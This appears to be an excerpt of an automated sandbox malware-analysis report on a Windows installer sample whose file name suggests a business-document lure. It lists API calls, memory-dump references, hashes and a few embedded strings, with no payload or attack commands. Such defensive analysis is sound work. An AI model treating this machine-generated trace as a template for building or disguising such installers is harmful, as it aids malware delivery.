                                                                                                            • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                            • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                            • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                            • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                            • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                            • GetSysColor.USER32(?), ref: 004041E4
                                                                                                            • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                            • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                            • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                            • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                            • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                            • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                            • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                            • GetMessagePos.USER32 ref: 00404AA1
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                            • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                            • MulDiv.KERNEL32(0007A8CC,00000064,0007A8D0), ref: 00402D4D
                                                                                                            • wsprintfW.USER32 ref: 00402D5D
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                            Strings
                                                                                                            • verifying installer: %d%%, xrefs: 00402D57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-82062127
                                                                                                            • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                            • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D59
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID: Calibri
                                                                                                            • API String ID: 3808545654-1409258342
                                                                                                            • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                            • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                            • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                            • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                            APIs
                                                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                            • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                            • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                            • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                            • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                            • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                            • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nskEAE7.tmp$C:\Users\user\AppData\Local\Temp\nskEAE7.tmp\System.dll
                                                                                                            • API String ID: 3109718747-1648715972
                                                                                                            • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                            • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                            • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                            • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                            • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                            • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                            • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                            • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                            • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1148316912-0
                                                                                                            • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                            • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                            • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                            • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                            • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                            • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                            • wsprintfW.USER32 ref: 00404A1A
                                                                                                            • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s
                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                            • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                            • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                            • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                            • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
